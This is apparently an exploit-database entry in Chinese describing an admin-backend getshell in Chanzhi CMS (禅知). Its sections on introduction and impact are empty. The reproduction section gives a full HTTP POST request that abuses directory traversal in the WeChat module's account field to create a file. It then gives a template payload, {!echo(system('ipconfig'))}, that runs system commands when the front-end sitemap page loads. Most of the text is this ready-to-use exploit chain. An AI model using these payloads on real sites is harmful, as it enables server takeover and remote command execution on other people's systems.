禅知 后台getshell¶
一、漏洞简介¶
二、漏洞影响¶
三、复现过程¶
后台存在模板编辑,但是如果保存的话需要创建一个/system\tmp\xjrg.txt文件,那么我们找到一个可以创建任意文件的地方就
在/system/module/wechat/model.php
$qrcodeFile未过滤目录穿越导致可以去其他地方创建文件夹通过微信设置原始ID的地方写入穿越的文件路径
POST /chanzhieps/www/admin.php?m=wechat&f=edit&publicID=1 HTTP/1.1
Host: 0-sec.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/chanzhieps/www/admin.php?m=wechat&f=edit&publicID=1
Content-Length: 120
Cookie: adminsid=ae8tu3s80j8cfvh2hkgu41bbig; adminLang=zh-cn; adminDevice=desktop; theme=default; currentGroup=setting; frontsid=eaa0tdicbqfq0lurm89t3n9fvn; frontLang=zh-cn; frontDevice=desktop
X-Forwarded-For: 8.8.8.8
Connection: close
type=subscribe&name=123&account=..%2F..%2F..%2Fsystem%5Ctmp%5Cxjrg.txt%5C1&appID=789&appSecret=100&token=222&certified=0
点一下二维码,再随便传一张图片,可以看到创建了一个xjrg.txt文件夹
现在我们再去编辑模板,{!echo(system(\'ipconfig\'))},可以直接写入一句话
然后在访问前台
http:/0-sec.org/chanzhieps/www/index.php/sitemap/